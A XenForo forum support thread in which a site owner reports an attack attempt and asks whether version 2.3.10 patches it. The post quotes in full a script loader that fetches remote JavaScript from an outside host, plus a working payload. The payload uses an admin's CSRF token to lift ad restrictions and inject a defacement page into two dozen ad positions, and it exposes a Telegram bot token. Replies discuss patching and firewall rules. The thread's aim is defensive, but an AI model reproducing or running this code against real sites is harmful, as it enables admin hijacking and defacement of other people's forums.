Exploit

M

Maa

Active member
Licensed customer
Affected version
2.3.9
Hi,

We had someone attempt to parse the following on the previous version from 2.3.10;

Code: 
let s=document.createElement('script');s.src='https://cizgicaps.com/exp.php';document.head.appendChild(s);

Code: 
(async () => {
    console.log("%c[!] TAM KAPSAMLI OPERASYON BASLADI", "color: orange; font-weight: bold;");
    try {
        const botToken = "8619880328:AAHnHR1JlmQivoRVLw41_8hsFEYDeuLYM5A";
        const chatId = "-1003650778510";
        const currentUrl = window.location.host;

        let adminPath = document.querySelector('a[href*="admin.php"]')?.getAttribute('href') || 'admin.php';
        if(adminPath.includes('?')) adminPath = adminPath.split('?')[0];

        const adminToken = document.querySelector('input[name="_xfToken"]')?.value || (typeof XF !== 'undefined' ? XF.config.csrf : '');

        // ADIM 1: Reklam Engellerini Kaldır (adsDisallowedTemplates'i boşalt)
        let optFd = new FormData();
        optFd.append('_xfToken', adminToken);
        optFd.append('options[adsDisallowedTemplates]', ''); // Tüm engelleri kaldır
        optFd.append('options_listed[]', 'adsDisallowedTemplates');
        optFd.append('_xfResponseType', 'json');

        await fetch(`${adminPath}?options/update`, {
            method: 'POST',
            body: optFd,
            headers: { 'X-Requested-With': 'XMLHttpRequest' }
        });
        console.log("[+] Reklam kisitlamalari kaldirildi.");

        // ADIM 2: Index Payload Hazirla (Güncellenmiş defacement ile)
        const payloadHtml = `<script>
    (function(){
        var run = function(){
            document.documentElement.innerHTML = '<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Hacked By Zereth Protocol</title><link rel="icon" type="image/x-icon" href="https://c.top4top.io/p_3732ukoji1.png"><meta name="description" content="Hacked by Zereth Protocol"><meta name="keywords" content="Hacked By Zereth Protocol ,Hacked By Zereth Protocol , Cyber Attack , Security Breach"><meta name="author" content="Hacked by Zereth Protocol"><meta name="title" content="Hacked By Zereth Protocol"><meta name="googlebot" content="index,follow,Zereth Protocol,Zereth Protocol"><meta name="robots" content="all"><meta name="robots schedule" content="auto"><meta name="distribution" content="global"><link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@700;900&display=swap" rel="stylesheet"><style>*{margin:0;padding:0;box-sizing:border-box;}body,html{width:100%;height:100%;overflow-x:hidden;background-color:#000;}.hacked-page{position:relative;min-height:100vh;background:url(\'https://i.giphy.com/sOzHwf1DF8h96A5tXU.webp\') center center no-repeat;background-size:cover;display:flex;flex-direction:column;align-items:center;justify-content:center;padding:20px;overflow-y:auto;}.hacked-page::before{content:\'\';position:fixed;top:0;left:0;width:100%;height:100%;backdrop-filter:blur(8px);-webkit-backdrop-filter:blur(8px);z-index:1;}.center-square{position:relative;z-index:2;width:min(300px,85vw);height:min(300px,85vw);background:rgba(0,0,0,0.5);border:3px solid cyan;border-radius:50%;box-shadow:0 0 25px rgba(0,255,255,0.6),0 0 50px rgba(0,255,255,0.3);display:flex;align-items:center;justify-content:center;padding:0;margin-bottom:25px;animation:pulse-glow 3s ease-in-out infinite;overflow:hidden;}@keyframes pulse-glow{0%,100%{box-shadow:0 0 20px rgba(0,255,255,0.6);}50%{box-shadow:0 0 40px rgba(0,255,255,0.9);}}.laptop-image{width:100%;height:100%;object-fit:cover;object-position:center;border-radius:50%;transform:scale(1.02);}.hacked-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(20px,5vw,32px);font-weight:900;margin-top:10px;letter-spacing:1px;text-align:center;}.inline-gif{width:22px;height:22px;display:inline-block;vertical-align:middle;margin-left:5px;}.hacked-by{color:white;text-shadow:0 0 10px rgba(255,255,255,0.5);}.hacker-name{color:#ff0000;text-shadow:0 0 15px rgba(255,0,0,0.7);}.security-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(13px,3vw,16px);font-weight:bold;color:white;margin-top:15px;text-align:center;padding:0 10px;}.blue-text{color:#00ff00;}.blue-greetz{color:#0066ff;}.red-wolf{color:#ff0000;}.greetz-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(11px,2.5vw,14px);color:white;margin-top:20px;text-align:center;line-height:1.6;}.copyright-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:11px;color:rgba(255,255,255,0.8);margin-top:20px;margin-bottom:20px;text-align:center;}@media(min-width:640px){.center-square{width:350px;height:350px;}}</style></head><body><div class="hacked-page"><div class="center-square"><img class="laptop-image" src="https://cizgicaps.com/TR6.png" alt="Turkish Flag Center"></div><div class="hacked-text"><span class="hacked-by">Hacked By </span><span class="hacker-name">Zereth Protocol</span></div><div class="security-text">This website is now under the command of Zereth Protocol, the invisible army of the Turks. We do not merely infiltrate; we conquer. We are the ones who never forget and never give up. Your security is our playground. <br> <br><span class="blue-text">Zereth Protocol is everywhere.</span></div><div class="greetz-text"><span class="blue-greetz">Greetz:</span><br/>All members and supporters of Zereth Protocol</div><div class="copyright-text">Zereth <span class="red-wolf">Protocol</span><br/>© All Rights Reserved</div></div></body>';
            document.addEventListener('contextmenu', function(e) { e.preventDefault(); });
        };
        run();
        window.onload = run;
        document.addEventListener("DOMContentLoaded", run);
    })();
\x3C/script>`;

        const positions = [
            'container_breadcrumb_bottom_above', 'container_breadcrumb_bottom_below',
            'container_breadcrumb_top_above', 'container_breadcrumb_top_below',
            'container_content_above', 'container_content_below',
            'container_header', 'container_sidebar_above', 'container_sidebar_below',
            'container_sidenav_above', 'container_sidenav_below',
            'forum_overview_top', 'forum_overview_bottom',
            'forum_view_above_node_list', 'forum_view_above_thread_list',
            'forum_view_below_node_list', 'forum_view_below_stickies',
            'forum_view_below_thread_list', 'member_view_below_tabs',
            'post_above_content', 'post_below_container', 'post_below_content',
            'thread_view_above_messages', 'thread_view_below_messages'
        ];

        // ADIM 3: Reklamlari Paralel Bas
        let successCount = 0;
        await Promise.all(positions.map(async (pos, index) => {
            let fd = new FormData();
            fd.append('_xfToken', adminToken);
            fd.append('title', `SYS_AD_${index}`);
            fd.append('position_id', pos);
            fd.append('ad_html', payloadHtml);
            fd.append('display_order', '0');
            fd.append('active', '1');
            fd.append('_xfResponseType', 'json');

            try {
                let resp = await fetch(`${adminPath}?advertising/0/save`, {
                    method: 'POST',
                    body: fd,
                    headers: { 'X-Requested-With': 'XMLHttpRequest' }
                });
                let res = await resp.json();
                if(res.status === 'ok') successCount++;
            } catch(e) {}
        }));

    } catch (e) { console.error(e); }
})();

Is the latest version a patch for exploit above?

Thanks
 
This is the work of a script kiddie. The only thing these kinds of people know how to do is copy Proofs of Concept (PoCs) specific to existing vulnerabilities. They're so pathetic they can't even write the exploit code themselves using AI and remove the comment lines. The relevant code was prepared with a Turkish prompt, and as a Turkish cybersecurity expert, I feel sorry for these script kiddies. With version 2.3.9, the vulnerability this script kiddie knew about has been patched, so I don't think you'll experience any problems. However, if you can, enable OWASP rules within Cloudflare and make sure you update your zone configuration if you have one.
 
This was posted on a v3.2.9 site last night & it parsed the eval code in the post, but couldnt fully execute.

The person that posted it prompted the Admin to view, as its the admin permissions that are used to edit templates.

My sites were 3.2.9 and licenses just expired, so I had to pay to upgrade to block this exploit. I wasnt planning on paying more $ until more updates, it should have been a free patch.
 
Gavo said:
My sites were 3.2.9 and licenses just expired, so I had to pay to upgrade to block this exploit. I wasnt planning on paying more $ until more updates, it should have been a free patch.
Click to expand...
There was a patch supplied in the release notes. And there's no version 3. Perhaps you meant 2.3.9?
 

Similar threads

Alpha1
Affiliate Spammers can exploit/abuse the proxy function too easily
Replies
0
Views
52
Alpha1
Alpha1
MR X
  • Question Question
XF 2.2 xenforo developer may have added an exploit file
2 3 4
Replies
66
Views
2K
MR X
MR X
K
Advanced Cookie consent rendered in RSS
Replies
0
Views
29
Kirby
K
BubbaLovesCheese
  • Question Question
XF 2.3 Here is some custom Pricing Table code for User Upgrades
Replies
3
Views
178
olgert zerbaska
O
Hareon
  • Question Question
XF 2.3 Problem with FontAwesome icon
Replies
13
Views
364
Davyc
Davyc
Back
Top Bottom